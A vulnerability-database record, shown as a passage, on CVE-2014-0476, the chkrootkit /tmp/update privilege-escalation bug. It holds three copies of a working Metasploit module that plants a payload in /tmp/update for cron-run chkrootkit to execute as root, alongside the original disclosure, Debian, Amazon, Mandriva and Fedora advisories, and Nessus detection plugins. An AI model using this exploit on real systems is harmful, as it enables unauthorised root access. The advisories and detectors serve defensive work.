Local exploit for linux platform", "published": "2015-11-20T00:00:00", "type": "exploitdb", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2015-11-20T00:00:00", "id": "EDB-ID:38775", "href": "https://www.exploit-db.com/exploits/38775/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass Metasploit4 < Msf::Exploit::Local\r\n\r\n # This could also be Excellent, but since it requires\r\n # up to one day to pop a shell, let's set it to Manual instead.\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chkrootkit Local Privilege Escalation',\r\n 'Description' => %q{\r\n Chkrootkit before 0.50 will run any executable file named\r\n /tmp/update as root, allowing a trivial privsec.\r\n\r\n WfsDelay is set to 24h, since this is how often a chkrootkit\r\n scan is scheduled by default.\r\n },\r\n 'Author' => [\r\n 'Thomas Stangner', # Original exploit\r\n 'Julien \"jvoisin\" Voisin' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-0476'],\r\n ['OSVDB', '107710'],\r\n ['EDB', '33899'],\r\n ['BID', '67813'],\r\n ['CWE', '20'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q2/430']\r\n ],\r\n 'DisclosureDate' => 'Jun 04 2014',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'Privileged' => true,\r\n 'Stance' => Msf::Exploit::Stance::Passive,\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h\r\n ))\r\n\r\n register_options([\r\n OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])\r\n ])\r\n end\r\n\r\n def check\r\n version = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 
2>&1\")\r\n\r\n if version =~ /chkrootkit version 0\\.[1-4]/\r\n Exploit::CheckCode::Appears\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_warning('Rooting depends on the crontab (this could take a while)')\r\n\r\n write_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\")\r\n cmd_exec('chmod +x /tmp/update')\r\n register_file_for_cleanup('/tmp/update')\r\n\r\n print_status('Payload written to /tmp/update')\r\n print_status('Waiting for chkrootkit to run via cron...')\r\n end\r\n\r\nend", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38775/"}, {"lastseen": "2016-02-03T20:06:05", "description": "chkrootkit 0.49 - Local Root Vulnerability. CVE-2014-0476. Local exploit for linux platform", "published": "2014-06-28T00:00:00", "type": "exploitdb", "title": "chkrootkit 0.49 - Local Root Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-28T00:00:00", "id": "EDB-ID:33899", "href": "https://www.exploit-db.com/exploits/33899/", "sourceData": "We just found a serious vulnerability in the chkrootkit package, which\r\nmay allow local attackers to gain root access to a box in certain\r\nconfigurations (/tmp not mounted noexec).\r\n\r\nThe vulnerability is located in the function slapper() in the\r\nshellscript chkrootkit:\r\n\r\n#\r\n# SLAPPER.{A,B,C,D} and the multi-platform variant\r\n#\r\nslapper (){\r\n SLAPPER_FILES=\"${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c\"\r\n SLAPPER_FILES=\"$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \\\r\n ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b\"a\r\n SLAPPER_PORT=\"0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 \"\r\n OPT=-an\r\n STATUS=0\r\n file_port=\r\n\r\n if ${netstat} \"${OPT}\"|${egrep} \"^tcp\"|${egrep} \"${SLAPPER_PORT}\">\r\n/dev/null 2>&1\r\n then\r\n STATUS=1\r\n [ \"$SYSTEM\" = \"Linux\" ] && 
file_port=`netstat -p ${OPT} | \\\r\n $egrep ^tcp|$egrep \"${SLAPPER_PORT}\" | ${awk} '{ print $7 }' |\r\ntr -d :`\r\n fi\r\n for i in ${SLAPPER_FILES}; do\r\n if [ -f ${i} ]; then\r\n file_port=$file_port $i\r\n STATUS=1\r\n fi\r\n done\r\n if [ ${STATUS} -eq 1 ] ;then\r\n echo \"Warning: Possible Slapper Worm installed ($file_port)\"\r\n else\r\n if [ \"${QUIET}\" != \"t\" ]; then echo \"not infected\"; fi\r\n return ${NOT_INFECTED}\r\n fi\r\n}\r\n\r\n\r\nThe line 'file_port=$file_port $i' will execute all files specified in\r\n$SLAPPER_FILES as the user chkrootkit is running (usually root), if\r\n$file_port is empty, because of missing quotation marks around the\r\nvariable assignment.\r\n\r\nSteps to reproduce:\r\n\r\n- Put an executable file named 'update' with non-root owner in /tmp (not\r\nmounted noexec, obviously)\r\n- Run chkrootkit (as uid 0)\r\n\r\nResult: The file /tmp/update will be executed as root, thus effectively\r\nrooting your box, if malicious content is placed inside the file.\r\n\r\nIf an attacker knows you are periodically running chkrootkit (like in\r\ncron.daily) and has write access to /tmp (not mounted noexec), he may\r\neasily take advantage of this.\r\n\r\n\r\nSuggested fix: Put quotation marks around the assignment.\r\n\r\nfile_port=\"$file_port $i\"\r\n\r\n\r\nI will also try to contact upstream, although the latest version of\r\nchkrootkit dates back to 2009 - will have to see, if I reach a dev there.", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33899/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:39", "description": "", "published": "2015-11-20T00:00:00", "type": "packetstorm", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2015-11-20T00:00:00", "id": "PACKETSTORM:134484", "href": 
"https://packetstormsecurity.com/files/134484/Chkrootkit-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass Metasploit4 < Msf::Exploit::Local \n \n# This could also be Excellent, but since it requires \n# up to one day to pop a shell, let's set it to Manual instead. \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Chkrootkit Local Privilege Escalation', \n'Description' => %q{ \nChkrootkit before 0.50 will run any executable file named \n/tmp/update as root, allowing a trivial privsec. \n \nWfsDelay is set to 24h, since this is how often a chkrootkit \nscan is scheduled by default. \n}, \n'Author' => [ \n'Thomas Stangner', # Original exploit \n'Julien \"jvoisin\" Voisin' # Metasploit module \n], \n'References' => [ \n['CVE', '2014-0476'], \n['OSVDB', '107710'], \n['EDB', '33899'], \n['BID', '67813'], \n['CWE', '20'], \n['URL', 'http://seclists.org/oss-sec/2014/q2/430'] \n], \n'DisclosureDate' => 'Jun 04 2014', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'SessionTypes' => ['shell', 'meterpreter'], \n'Privileged' => true, \n'Stance' => Msf::Exploit::Stance::Passive, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0, \n'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h \n)) \n \nregister_options([ \nOptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) \n]) \nend \n \ndef check \nversion = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\") \n \nif version =~ /chkrootkit version 0\\.[1-4]/ \nExploit::CheckCode::Appears \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \nprint_warning('Rooting depends on the crontab (this could take a while)') \n \nwrite_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\") 
\ncmd_exec('chmod +x /tmp/update') \nregister_file_for_cleanup('/tmp/update') \n \nprint_status('Payload written to /tmp/update') \nprint_status('Waiting for chkrootkit to run via cron...') \nend \n \nend \n`\n", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134484/chkrootkit.rb.txt"}], "debian": [{"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2945-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nJune 03, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chkrootkit\nCVE ID : CVE-2014-0476\n\nThomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.49-5.\n\nWe recommend that you upgrade your chkrootkit packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-06-03T21:37:45", "published": "2014-06-03T21:37:45", "id": "DEBIAN:DSA-2945-1:D051E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00125.html", "title": "[SECURITY] [DSA 2945-1] chkrootkit security update", "type": "debian", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:36:27", "bulletinFamily": "unix", 
"cvelist": ["CVE-2014-0476"], "description": "**Issue Overview:**\n\nA quoting issue was found in chkrootkit which would lead to a file in /tmp/ being executed, if /tmp/ was mounted without the noexec option. chkrootkit is typically run as the root user. A local attacker could use this flaw to escalate their privileges.\n\n \n**Affected Packages:** \n\n\nchkrootkit\n\n \n**Issue Correction:** \nRun _yum update chkrootkit_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n chkrootkit-debuginfo-0.49-9.8.amzn1.i686 \n chkrootkit-0.49-9.8.amzn1.i686 \n \n src: \n chkrootkit-0.49-9.8.amzn1.src \n \n x86_64: \n chkrootkit-0.49-9.8.amzn1.x86_64 \n chkrootkit-debuginfo-0.49-9.8.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T16:36:00", "published": "2014-07-09T16:36:00", "id": "ALAS-2014-370", "href": "https://alas.aws.amazon.com/ALAS-2014-370.html", "title": "Important: chkrootkit", "type": "amazon", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-14T23:37:42", "description": "Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. 
WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.\n", "published": "2015-11-18T18:50:57", "type": "metasploit", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/LOCAL/CHKROOTKIT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # This could also be Excellent, but since it requires\n # up to one day to pop a shell, let's set it to Manual instead.\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Chkrootkit Local Privilege Escalation',\n 'Description' => %q{\n Chkrootkit before 0.50 will run any executable file named /tmp/update\n as root, allowing a trivial privilege escalation.\n\n WfsDelay is set to 24h, since this is how often a chkrootkit scan is\n scheduled by default.\n },\n 'Author' => [\n 'Thomas Stangner', # Original exploit\n 'Julien \"jvoisin\" Voisin' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2014-0476'],\n ['OSVDB', '107710'],\n ['EDB', '33899'],\n ['BID', '67813'],\n ['CWE', '20'],\n ['URL', 'https://seclists.org/oss-sec/2014/q2/430']\n ],\n 'DisclosureDate' => '2014-06-04',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Privileged' => true,\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Targets' => [['Automatic', {}]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h\n ))\n\n register_options([\n OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])\n ])\n end\n\n def check\n version = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\")\n\n if version =~ /chkrootkit version 
0\\.[1-4]/\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_warning('Rooting depends on the crontab (this could take a while)')\n\n write_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\")\n cmd_exec('chmod +x /tmp/update')\n register_file_for_cleanup('/tmp/update')\n\n print_status('Payload written to /tmp/update')\n print_status('Waiting for chkrootkit to run via cron...')\n end\nend\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/local/chkrootkit.rb"}], "nessus": [{"lastseen": "2021-01-07T11:54:38", "description": "Updated chkrootkit package fixes security vulnerability :\n\nThe chkrootkit script contains a flaw that allows a local attacker to\ncreate an executable in /tmp that will be run by the user running\nchkrootkit (usually root), allowing the attacker to escalate\nprivileges (CVE-2014-0476).", "edition": 25, "published": "2014-06-12T00:00:00", "title": "Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-12T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:chkrootkit"], "id": "MANDRIVA_MDVSA-2014-122.NASL", "href": "https://www.tenable.com/plugins/nessus/74480", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:122. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74480);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"MDVSA\", value:\"2014:122\");\n\n script_name(english:\"Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated chkrootkit package fixes security vulnerability :\n\nThe chkrootkit script contains a flaw that allows a local attacker to\ncreate an executable in /tmp that will be run by the user running\nchkrootkit (usually root), allowing the attacker to escalate\nprivileges (CVE-2014-0476).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0249.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"chkrootkit-0.49-6.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:54", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. 
A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-13T00:00:00", "title": "Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:chkrootkit"], "id": "FEDORA_2014-7090.NASL", "href": "https://www.tenable.com/plugins/nessus/74502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7090.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74502);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"FEDORA\", value:\"2014-7090\");\n\n script_name(english:\"Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104457\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134341.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96585382\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"chkrootkit-0.49-9.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:54", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-13T00:00:00", "title": "Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:chkrootkit"], "id": "FEDORA_2014-7071.NASL", "href": "https://www.tenable.com/plugins/nessus/74500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7071.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74500);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"FEDORA\", value:\"2014-7071\");\n\n script_name(english:\"Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104457\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134326.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd61f626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"chkrootkit-0.49-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:36", "description": "Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain 